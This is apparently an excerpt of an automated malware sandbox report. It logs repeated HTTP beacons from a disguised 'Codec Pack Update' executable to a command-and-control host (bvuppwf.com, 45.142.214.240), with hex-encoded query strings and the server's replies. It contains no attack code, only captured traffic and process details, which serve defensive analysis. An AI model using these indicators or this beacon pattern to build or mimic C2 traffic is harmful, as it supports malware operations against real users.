Mar 29, 2024 12:59:46.108211040 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:46.415388107 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49800 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:46.748719931 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:47.047234058 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n
Mar 29, 2024 12:59:47.153192043 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:47.457124949 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 49801 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:47.793024063 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:48.091517925 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n
Mar 29, 2024 12:59:48.200098038 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:48.501480103 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 49802 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:48.841670036 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:49.144664049 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 49803 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:49.480505943 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:49.777338028 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 49804 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:50.109189034 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:50.411803961 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 49805 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:50.746015072 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:51.042684078 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n
Mar 29, 2024 12:59:51.153063059 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:51.456732988 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 49806 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:51.794274092 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:52.092668056 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:59:52.205310106 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:52.510409117 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 49807 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:52.843293905 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:53.149842978 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 49808 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:53.482568979 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:53.783272982 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49809 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:54.123874903 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:54.431598902 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 49810 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:54.762451887 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:55.064431906 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49811 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:55.404428959 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:55.707166910 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 49812 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:56.055876970 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:56.367341995 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 49813 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:56.945214987 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:57.244874001 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 49814 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:59.031291962 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:59.332313061 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 49815 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:59:59.675457001 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:59:59.972255945 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:59:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 49816 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 13:00:00.317750931 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 13:00:00.622545958 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 12:00:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 49817 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 13:00:01.144442081 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 13:00:01.452119112 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 12:00:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 49818 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 13:00:01.795964956 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 13:00:02.097373009 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 12:00:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 49819 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 13:00:02.442250967 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 13:00:02.749161005 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 12:00:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 49820 | 45.142.214.240 | 80 | 7084 | C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 13:00:03.080619097 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
Host: bvuppwf.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 13:00:03.385246992 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 12:00:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20



                                                                        Target ID:0
                                                                        Start time:12:57:56
                                                                        Start date:29/03/2024
                                                                        Path:C:\Users\user\Desktop\0RWRPBSuDx.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\0RWRPBSuDx.exe"
                                                                        Imagebase:0x400000
                                                                        File size:1'954'271 bytes
